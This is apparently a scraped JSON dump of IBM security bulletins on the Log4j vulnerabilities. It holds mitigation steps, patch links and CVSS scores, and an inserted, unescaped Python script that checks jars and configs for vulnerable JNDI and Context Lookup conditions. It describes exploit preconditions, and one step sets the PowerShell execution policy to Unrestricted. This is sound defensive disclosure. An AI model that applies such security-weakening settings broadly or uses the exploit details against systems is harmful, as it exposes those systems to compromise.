jars, JMSAppender and SocketServer, that were reported in CVE-2021-4104. Information Server releases are not vulnerable to this CVE. However, the script will also remove these classes. 
\nWe estimate that the script should take less than 20 minutes to execute. \n \nUsage: \niis-log4j-mitigation.sh -i|-install-dir <path> [-w|-work-dir <working-dir-path>] [-l|-log4j-version <1|2>] [-r|-remove] \n\niis-log4j-mitigation.sh -help \n \nwhere \n<path> is the absolute path to the InfoSphere Information Server or WebSphere installation location. \nYou should run the script against each location. \n<working-dir-path> is the location for a temporary work directory used by the script. \nWe estimate that a minimum of 1G disk space is needed in the work directory. \n-log4j-version specifies the Apache Log4j version, '1' or '2', to mitigate. \nBy default, both log4j versions are mitigated. Script version 1.1 or later is needed to use this option. \n-remove should be specified to remove the classes. \nIf not specified, the script will only list the locations where the classes are found. \n-help provides information on usage and requirements. \n \n3\\. **Backup**: \nTake a backup of your Information Server and WebSphere Application Server directories. \n\n4\\. **Where to run the script and how to use it**: \nThe script should be run on the Information Server Services, Engine and Client tiers. \nThe script should also be run against the directory where WebSphere Application Server is located, assuming that it is not in the same directory tree as Information Server.\n\na. Stop Information Server. Ensure that no Information Server services or processes are running. \nb. For each tier/install location, first run the script without the -remove option to list all locations of the classes. \nNote the owner of the jars containing these classes. \nc. Next, as the jar owner, run the script with the -remove option to remove the classes from these locations. \nd. Finally, run the script again without the -remove option to check whether any locations are still reported. \ne. Manually check the system for any log4j instances that contain the classes. \nf. 
Restart Information Server. \n \n5\\. **Pre-requisites**: \n\nFor UNIX:\n\nSome of the steps in the script require zip, unzip and bash. \nYou may need to install zip, unzip and bash on UNIX systems.\n\n6\\. **Download script**:\n\nDownload the script for your platform to a directory that is not in the paths to be scanned.\n\nFor UNIX:\n\n \n_iis-log4j-mitigation.sh_\n\nFor Windows:\n\n \n_iis-log4j-mitigation.ps1_\n\n \nOn Windows, after the script is downloaded, examine the script properties (Alt+Enter or right-click -> Properties), and check whether there is a security notification at the bottom of the General tab that indicates: \n_This file came from another computer and might be blocked to help protect this computer._\n\nIf the security notification is present, do one of the following:\n\n * Check the Unblock check box. \nClick Apply.\n\n \n\n\n * Or set the execution policy in the PowerShell window to Unrestricted:\n \n \n Set-ExecutionPolicy -ExecutionPolicy Unrestricted\n\nYou may still be prompted to accept execution of the script each time you run it.\n\n \n\n\n7\\. **Apply mitigation (Services, Engine, Client tiers):**\n\nPerform the following actions on the tier indicated.\n\n### **Services Tier**\n\nRun the script against your services tier location, as indicated in step 4 above. \n\n\n**Address WebSphere Application Server:** \nRun the script against your WebSphere installation location, as indicated in step 4 above. \n \nWebSphere fixes for the log4j vulnerability should be applied per WebSphere security bulletins. They may require upgrading your WebSphere version prior to applying the fix. A list of WebSphere bulletins is provided in the Related Information section. \nFor advice on various WebSphere security fixes for log4j vulnerabilities, see [https://www.ibm.com/support/pages/node/6525860](<https://www.ibm.com/support/pages/node/6525860>). \na. 
Apply the [latest WebSphere fix](<https://www.ibm.com/support/pages/node/6526750>) (PH42762) for log4j (even if you applied the original fix PH42728). \nb. Additionally, \nFor Liberty profile, apply [https://www.ibm.com/support/pages/node/6526824](<https://www.ibm.com/support/pages/node/6526824>) (PH42759) \nFor Network Deployment profile, apply [https://www.ibm.com/support/pages/node/6528220](<https://www.ibm.com/support/pages/node/6528220>) (PH42899)\n\n**Update Solr if you do not have a Microservices tier:**\n\n 1. Change directory to <INSTALL_LOCATION>/shared-open-source/solr/install/bin\n 2. Edit the Solr scripts solr.in.sh or solr.in.cmd \nUNIX \nAppend _SOLR_OPTS=\"$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true\"_ \nWindows \nAppend _set SOLR_OPTS=%SOLR_OPTS% -Dlog4j2.formatMsgNoLookups=true_\n 3. Restart the services \n \nLINUX \n/shared-open-source/bin/stop-linux-services.sh \n/shared-open-source/bin/start-linux-services.sh \nAIX \n/shared-open-source/bin/stop-aix-services.sh \n/shared-open-source/bin/start-aix-services.sh \nWindows \n/shared-open-source/bin/stop-windows-services.bat \n/shared-open-source/bin/start-windows-services.bat\n\n**Engine tier**\n\nRun the script as indicated in step 4 above.\n\n**Client tier**\n\nRun the script as indicated in step 4 above.\n\n8\\. **Apply mitigation (Microservices tier):**\n\nIf you have the Microservices tier installed, download the archive (ms-tier-log4shell-scripts-0.1.0.tar.gz) to mitigate the vulnerability on the Microservices tier. The archive contains several scripts and a readme file which explains how to use the scripts. 
You can apply this mitigation even if you applied the instructions in an earlier version of this bulletin.\n\nCopy the archive to a new directory on the system that is running the Microservices tier, uncompress it and extract the contents.\n\nRead the instructions in the README.md file.\n\nRun the scripts under the same user id that installed the Microservices tier (the user id that runs kubectl commands).\n\nNote: The Microservices tier only runs on Linux.\n\nms-tier-log4shell-scripts-0.1.0.tar.gz\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nWebSphere bulletins: \n[WebSphere advice and FAQ on addressing log4j vulnerabilities](<https://www.ibm.com/support/pages/node/6525860>) \n[WebSphere bulletin for log4j - PH42762 (supersedes PH42728)](<https://www.ibm.com/support/pages/node/6526750>) \nAdditional fix for Liberty: <https://www.ibm.com/support/pages/node/6526824>\n\nAdditional fix for Network Deployment: <https://www.ibm.com/support/pages/node/6528220>\n\nDb2 bulletins:\n\nDb2 V11.5 has been identified to be vulnerable in some circumstances. (Reference: <https://www.ibm.com/support/pages/node/6526462>). 
\nThe configuration of Db2 V11.5 used by IBM InfoSphere Information Server does not include the vulnerable configuration.\n\n## Change History\n\n16 Dec 2021: Initial Publication \n17 Dec 2021: Updated bulletin to indicate that mitigation can also be done on 11.7.1.1 and 11.7.1.2 installations \nAdditional command needs to be executed on Microservices tier for platform-services sts elasticsearch \nFix will be applicable to 11.7.1.3 installations. \nAdded Related WebSphere security bulletins \n18 Dec 2021: 11.5 release is affected \n20 Dec 2021: On AIX, zip may have to be installed in order to do some of the steps. Clarified possible break in product features. \n21 Dec 2021: If no Microservices tier, for Solr, an AIX specific script must be used to restart shared open source components \nAdd 6528220 and 6526824 to the list of relevant WebSphere bulletins; stops loading of JndiLookup class \nMicroservices tier mitigation is limited to 11.7.1.1 Service Pack 2 and 11.7.1.3 installations \n22 Dec 2021: Steps updated with new script, no need to set custom properties or environment flags, coverage for 11.7, 11.5, 11.3 \n23 Dec 2021: Mitigation script for Windows added; clarification regarding Db2 security bulletin added. \n24 Dec 2021: Updated the instructions for mitigating the Microservices tier. 
\n28 Dec 2021: Updated taxonomy, updated description and information of WebSphere fixes \n30 Dec 2021: Owner of jar should run the script, Windows script replaced with manual steps \n31 Dec 2021: Not vulnerable to CVE-2021-4104 but the script will remove the related classes \nUpdated script iis-log4j-mitigation.sh: new option -log4j-version to mitigate specific version of log4j \n06 Jan 2022: Fix published for 11.7.1.3 \n07 Jan 2022: Updated summary to indicate that the fix deploys log4j 2.16.0 \n11 Jan 2022: Removed caution that product features may break with the mitigation/fix, as no such occurrence \nAdded new mitigation script for Windows that does not use zip and unzip \nBackup and purge the Updates folder if you want to remove vulnerable log4j jars from there \n14 Jan 2022: Also, backup and purge the _uninstall folder to remove vulnerable log4j jars from there \n18 Jan 2022: Removed caution that mitigation does not cover all relevant situations \n20 Jan 2022: Removed link to original WebSphere bulletin, added pointer to Related information section and blog \n21 Jan 2022: Changed title of step 1 from \"Upgrade IBM InfoSphere Information Server\" to \"Applicability of the mitigation steps\" \n26 Jan 2022: Updated 1.2 version of Windows mitigation script has better error handling of some situations \n\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZJPZ\",\"label\":\"IBM InfoSphere Information Server\"},\"ARM Category\":[{\"code\":\"a8m50000000L0sjAAC\",\"label\":\"Security Bulletins\"}],\"ARM Case Number\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.3.0;11.3.1;11.5.0;11.7.0;11.7.1\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-26T18:23:41", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Log4j affects IBM InfoSphere Information Server (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-26T18:23:41", "id": "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "href": "https://www.ibm.com/support/pages/node/6527372", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nApache Log4j Vulnerability Affects IBM Sterling Control Center (CVE-2021-45046). Customers are encourages to take action and apply the fix below. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Control Center| 6.1.3 \nIBM Control Center| 6.2.1.0 \nIBM Control Center| 6.2.0.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now. \n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Sterling Control Center| 6.2.1.0| iFix03| [Fix Central - 6.2.1.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.1.0&platform=All&function=all>) \nIBM Sterling Control Center| 6.2.0.0| iFix13| [Fix Central - 6.2.0.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.0.0&platform=All&function=all>) \nIBM Sterling Control Center| 6.1.3.0| iFix09| [Fix Central - 6.1.3.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.1.3.0&platform=All&function=all>) \n \nPlease NOTE: \n\nThe fix packages listed above also include the fix for the related Log4j vulnerability CVE-2021-44228 (originally addressed in the previous iFix number). 
\n\nSee: <https://www.ibm.com/support/pages/node/6527966>\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9GLA\",\"label\":\"IBM Control Center\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.2.0.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9GLA\",\"label\":\"IBM Control Center\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.1.3.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9GLA\",\"label\":\"IBM Control Center\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.2.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": 
"2021-12-21T17:02:49", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Sterling Control Center (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T17:02:49", "id": "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "href": "https://www.ibm.com/support/pages/node/6529304", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-28T23:39:21", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library. The library is used by Elasticsearch, a dependency of IBM Cloud Private, for logging messages to files. This bulletin identifies the security fixes to apply to address the Log4Shell vulnerability (CVE-2021-45046). \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. 
\nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Private| 3.1.0 \nIBM Cloud Private| 3.1.1 \nIBM Cloud Private| 3.1.2 \nIBM Cloud Private| 3.2.0 \nIBM Cloud Private| 3.2.1 CD \nIBM Cloud Private| 3.2.2 CD \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\nThe recommended solution involves the IBM Cloud Private ibm-icplogging component. It is recommended that you follow the instructions for the component in the links listed below:\n\nFor IBM Cloud Private 3.1.0: [IBM Cloud Private 3.1.0 Patch](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.0-build600961-51486&includeSupersedes=0> \"IBM Cloud Private 3.1.0 Patch\" )\n\nFor IBM Cloud Private 3.1.1: [IBM Cloud Private 3.1.1 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.1-build600916-51406&includeSupersedes=0> \"IBM Cloud Private 3.1.1 Patch\" )\n\nFor IBM Cloud Private 3.1.2: [IBM Cloud Private 3.1.2 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.2-build600891-51342&includeSupersedes=0> \"IBM Cloud Private 3.1.2 Patch\" )\n\nFor IBM Cloud Private 3.2.0: [IBM Cloud Private 3.2.0 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.0-build600917-51405&includeSupersedes=0> \"IBM Cloud Private 3.2.0 Patch\" )\n\nFor IBM Cloud Private 3.2.1: [IBM 
Cloud Private 3.2.1 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.1-build600890-51324&includeSupersedes=0> \"IBM Cloud Private 3.2.1 Patch\" )\n\nFor IBM Cloud Private 3.2.2: [IBM Cloud Private 3.2.2 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.2-build600889-51343&includeSupersedes=0> \"IBM Cloud Private 3.2.2 Patch\" )\n\nFor IBM Cloud Private 3.1.0:\n\n * Upgrade to the latest Continuous Delivery (CD) update package, IBM Cloud Private 3.2.2. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n**Details of the ElasticSearch remediation for IBM Cloud Private Version 3.2.1 and 3.2.2**\n\nThe ibm-icplogging component has been updated to use Elasticsearch 6.8.22. This release upgrades the Log4j package to 2.17.0, which remediates the log4j vulnerabilities and should not trigger false positives in vulnerability scanners as was the case with Elasticsearch 6.8.21. \n\nElasticsearch announcement (ESA-2021-31)\n\n<https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>\n\n**Details of the ElasticSearch remediation for IBM Cloud Private Version 3.1.0, 3.1.1, 3.1.2, and 3.2.0**\n\nElasticsearch and Logstash within ibm-icplogging component have been updated to remediate the log4j vulnerabilities by removing the vulnerable JndiLookup class from the log4j-core package. 
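The remediation just described for 3.1.0 through 3.2.0 deletes the JndiLookup class from log4j-core instead of raising the version, so the jar's version string alone no longer says whether it is exploitable. The Python script below is an added example, not IBM's or Elastic's code, showing the check a practitioner would run against a deployed jar: it reads the log4j-core version from the jar's Maven pom.properties, tests whether the JndiLookup.class entry is still present, and inspects a log4j2 configuration for a Context Lookup inside a PatternLayout, which is the CVE-2021-45046 precondition quoted in this bulletin. It goes slightly beyond the bulletin by also treating the 2.12.2 and 2.3.1 backport releases from the Apache Log4j advisory as fixed. The sample jars and configuration snippets it builds are constructed stand-ins (a placeholder entry, no real bytecode), and the verdict strings and function names are this example's own.

```python
import os
import tempfile
import zipfile
from itertools import takewhile

# ${jndi:...} dispatches to this entry; the class-removal mitigation deletes it but leaves the version as is.
JNDI_LOOKUP_ENTRY = 'org/apache/logging/log4j/core/lookup/JndiLookup.class'
POM_PROPERTIES = 'META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties'
DQ = chr(34)  # double-quote character; every other literal in this file is single-quoted


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a qualifier such as '-beta9' is dropped."""
    return tuple(int(''.join(takewhile(str.isdigit, p)) or 0) for p in text.strip().split('.'))


def inspect_jar(jar_path):
    """(version tuple or None, JndiLookup.class present?) for one log4j-core jar."""
    with zipfile.ZipFile(jar_path) as jar:
        names = jar.namelist()
        version = None
        if POM_PROPERTIES in names:
            for line in jar.read(POM_PROPERTIES).decode('utf-8', 'replace').splitlines():
                if line.startswith('version='):
                    version = parse_version(line.split('=', 1)[1])
        return version, JNDI_LOOKUP_ENTRY in names


def is_fixed_release(version):
    """2.16.0+ removed message lookups; 2.12.2+ and 2.3.1+ are the Java 7 / Java 6 backports."""
    if version is None:
        return False
    floor = {(2, 12): (2, 12, 2), (2, 3): (2, 3, 1)}.get(version[:2], (2, 16, 0))
    return version >= floor


def pattern_layouts(config_xml):
    """Values of every pattern=... attribute (single- or double-quoted) in a log4j2 config."""
    found, pos = [], 0
    while True:
        pos = config_xml.find('pattern=', pos)
        if pos < 0 or pos + 8 >= len(config_xml):
            return found
        quote = config_xml[pos + 8]
        if quote not in (DQ, chr(39)):
            pos += 8
            continue
        end = config_xml.find(quote, pos + 9)
        if end < 0:
            return found
        found.append(config_xml[pos + 9:end])
        pos = end + 1


def uses_context_lookup(config_xml):
    """A Context (MDC) lookup inside a PatternLayout is the CVE-2021-45046 precondition."""
    return any('${ctx:' in p for p in pattern_layouts(config_xml))


def assess(jar_path, config_xml=''):
    """One verdict string for a log4j-core jar plus the configuration it is used with."""
    version, jndi_present = inspect_jar(jar_path)
    label = '.'.join(map(str, version)) if version else 'unknown'
    if not jndi_present:
        return 'mitigated: JndiLookup.class removed (log4j-core %s)' % label
    if is_fixed_release(version):
        return 'fixed: log4j-core %s' % label
    if version == (2, 15, 0):
        if uses_context_lookup(config_xml):
            return 'exposed: CVE-2021-45046 (2.15.0 with Context Lookup in PatternLayout)'
        return 'partially fixed: 2.15.0 without Context Lookup in PatternLayout; upgrade anyway'
    return 'exposed: CVE-2021-44228 (log4j-core %s, JndiLookup.class present)' % label


def build_sample_jar(directory, version, keep_jndi_lookup):
    """Constructed stand-in for log4j-core-<version>.jar; the class entry is a placeholder, not bytecode."""
    path = os.path.join(directory, 'log4j-core-%s.jar' % version)
    with zipfile.ZipFile(path, 'w') as jar:
        jar.writestr(POM_PROPERTIES, 'artifactId=log4j-core\nversion=%s\n' % version)
        if keep_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_ENTRY, b'placeholder')
    return path


def demo():
    """Assess constructed jars covering each case the bulletin describes (constructed configs too)."""
    workdir = tempfile.mkdtemp(prefix='log4j-check-')
    ctx_config = '<PatternLayout pattern=' + DQ + '%d %p $${ctx:loginId} %m%n' + DQ + '/>'
    mdc_config = '<PatternLayout pattern=' + DQ + '%d %p %X{loginId} %m%n' + DQ + '/>'
    return {
        'old_untouched': assess(build_sample_jar(workdir, '2.14.1', True)),
        'old_class_removed': assess(build_sample_jar(workdir, '2.14.1', False)),
        '2.15.0_ctx_lookup': assess(build_sample_jar(workdir, '2.15.0', True), ctx_config),
        '2.15.0_mdc_only': assess(build_sample_jar(workdir, '2.15.0', True), mdc_config),
        '2.17.0': assess(build_sample_jar(workdir, '2.17.0', True)),
    }
```

demo() returns the five verdicts; point assess() at a real log4j-core jar and the log4j2 configuration it is deployed with to check a live system. A scanner that keys on the version string alone reports the class-removed jar as vulnerable, whereas this check reports it as mitigated, which is exactly the disagreement to expect after applying the ibm-icplogging update.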
Some vulnerability scanners may continue to flag Elasticsearch in association with this vulnerability based on the Log4j version alone. However, the mitigation sufficiently protects against both remote code execution and information leakage.\n\nElasticsearch 5.0.0-5.6.10 and 6.0.0-6.3.2: Log4j CVE-2021-44228, CVE-2021-45046 remediation\n\n<https://discuss.elastic.co/t/elasticsearch-5-0-0-5-6-10-and-6-0-0-6-3-2-log4j-cve-2021-44228-cve-2021-45046-remediation/292054>\n\nLogstash 5.0.0-6.8.20 and 7.0.0-7.16.0: Log4j CVE-2021-44228, CVE-2021-45046 remediation\n\n<https://discuss.elastic.co/t/logstash-5-0-0-6-8-20-and-7-0-0-7-16-0-log4j-cve-2021-44228-cve-2021-45046-remediation/292343>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Dec 2021: Initial Publication \n22 Dec 2021: Add patch links for 3.1.1, 3.1.2, 3.2.0 \n18 Jan 2022: Add patch link for 3.1.0\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
